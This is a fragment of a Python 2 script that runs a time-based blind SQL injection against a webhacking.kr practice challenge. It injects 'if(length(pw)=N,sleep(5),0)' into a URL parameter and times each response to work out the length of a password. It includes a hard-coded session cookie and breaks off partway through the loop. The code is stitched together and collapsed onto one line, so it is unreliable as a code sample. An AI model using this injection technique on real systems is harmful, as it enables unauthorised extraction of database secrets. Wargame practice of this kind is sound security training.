    if connection is not None:
        connection.close()
#-*- coding: utf-8 -*- import sys import time import urllib2 import CookieManager challengeUrl = "https://webhacking.kr/challenge/web-34/" print "[+] Find password length" flagLength = 0 isFoundPassword = False CookieManager.addCookie("PHPSESSID", "9gka3g0g4soj3plpg8phk7p56f") for flagLength in range(1, 30): parameters = "?msg=1024" parameters += "&se=if(length(pw)=%d,sleep(5),0)" % flagLength httpRequest = urllib2.Request(challengeUrl+parameters) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: elapsedTime = time.time() httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print "[*] Blind SQL Injection...", flagLength elapsedTime = time.time() - elapsedTime